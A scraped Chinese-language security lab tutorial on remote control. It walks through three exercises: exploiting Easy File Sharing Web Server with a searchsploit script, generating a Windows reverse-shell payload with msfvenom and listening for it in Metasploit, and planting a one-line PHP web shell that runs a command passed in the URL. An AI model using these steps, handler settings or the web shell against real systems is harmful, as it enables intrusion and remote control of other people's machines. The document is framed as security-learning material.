2026/6/10 22:35:03
网站建设
项目流程
广州教育网站设计公司,一站式商家服务平台,查询域名注册信息,在线制作二维码生成器远程控制课程内容一、Easy File Sharing Web Server 存在远程溢出二、Kali中生成被控端三、在网站中写入一句话木马一、Easy File Sharing Web Server 存在远程溢出复现步骤打开Easy File Sharing Web Server#xff0c;并开启端口为8000的网站打开kali扫描对应ip地址可以看见…远程控制课程内容一、Easy File Sharing Web Server 存在远程溢出二、Kali中生成被控端三、在网站中写入一句话木马一、Easy File Sharing Web Server 存在远程溢出复现步骤打开Easy File Sharing Web Server并开启端口为8000的网站打开kali扫描对应ip地址可以看见8000端口开放了Easy File Sharing Web Server http 6.9说明目标主机已经运行了Easy File Sharing Web Server这个软件接下来我们用searchsploit查Easy File Sharing他能给出我们要用那些路径下的那些脚本这里我们的Easy File Sharing Web Server是7.2版本的所有我们用对应的脚本39009.py他会打开目标主机的计算器这样就完成了二、Kali中生成被控端复现步骤打开kali用msfvenom生成一个payload.exe注意这里的被控端是windows系统如果是安卓系统填androidlhost填你自己的kali的ip地址lport填一个没被占用的端口就行最后面的“/home/kali/payload.exe”是payload.exe文件生成时保存的路径填一个你能找到的路径就好最好不要放在“/root”路径下有可能payload文件会取不出来把生成的payload.exe发给被控端备用被控端要把杀毒软件关闭电脑自带的也要关闭接着打开msfconsole界面以此输入use exploit/multi/handlerset payload generic/shell_reverse_tcpset lhost 192.168.79.134(输入你自己的IP地址)set lport 7777(输入你的端口)注意lhost和lport要和刚刚生成payload文件时的一致最后输入exploit开始监听现在被控端打开payload.exe我们可以看看被控端的磁盘信息这样就成功了请不要乱输代码否则被控端的信息可能会被损坏输入exit退出三、在网站中写入一句话木马复现步骤右键创建一个新文档命名为shell.php打开shell.php写入一句话木马?php system($_REQUEST[cmd]);?保存后把shell.php放入“/var/www/html”路径下开启apacheservice apache2 start现在可以去浏览器验证是否成功了输入http://192.168.134/shell.php?cmdifconfig(IP地址是开启apache的主机的)可以看到网页成功运行了ifconfig本文仅用于网络安全学习严禁用于非法攻击违规使用后果自负。